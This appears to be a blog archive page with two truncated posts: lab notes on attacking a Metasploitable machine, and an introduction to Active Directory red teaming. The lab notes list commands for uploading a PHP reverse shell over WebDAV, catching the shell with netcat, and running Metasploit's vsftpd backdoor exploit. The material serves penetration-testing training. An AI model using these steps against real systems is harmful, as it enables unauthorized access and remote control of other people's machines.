Posts

Showing posts from January, 2026

Lab Key Notes - AD Red Team

Attacker Machine (192.168.50.2) - Victim Machine (Metasploitable) - (192.168.50.3)

Perform at Attacker Machine:

    nc 192.168.50.3 80  --> Victim Machine
    OPTIONS http://192.168.50.3
    host:192.168.50.3
    OPTIONS http://192.168.50.3/dav/ HTTP/1.0
    host:192.168.50.3

Upload php Web Shell:

    cadaver http://192.168.50.3/dav/
    ls /usr/share/webshells/php/
    nano /usr/share/webshells/php/php-reverse-shell.php
    change to ip: attacker machine (192.168.50.2) port: 1234

Upload shell:

    put /usr/share/webshells/php/php-reverse-shell.php

Get Reverse Shell:

    nc -nlvp 1234

Basic Commands:

    $ ifconfig
    $ /sbin/ifconfig

Tool: MSFConsole

    $ msfconsole
    $ search vsftpd
    $ found ==> exploit/unix/ftp/vsftpd_234_backdoor
    $ use exploit/unix/ftp/vsftpd_234_backdoor
    $ show options
    $ set RHOSTS 192.168.50.3 (Victim Machine)
    $ set verbose true
    $ run

Get the command shell:

    whoami

It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...

Active Directory - Red Teaming - Part 1

What is Red Teaming?

Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them.

Red Teams are divided into 3 Groups:

Red teams are typically divided into three groups: Cyber, which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social, which exploits human behavior using tactics like phishing or impersonation; and Physical, which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas.

Red Team Emulation

Emulates (copies) the behavior of a specific real-world threat group—including their tools, techniques, and attack patterns.

Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for.

Goal: Test how we...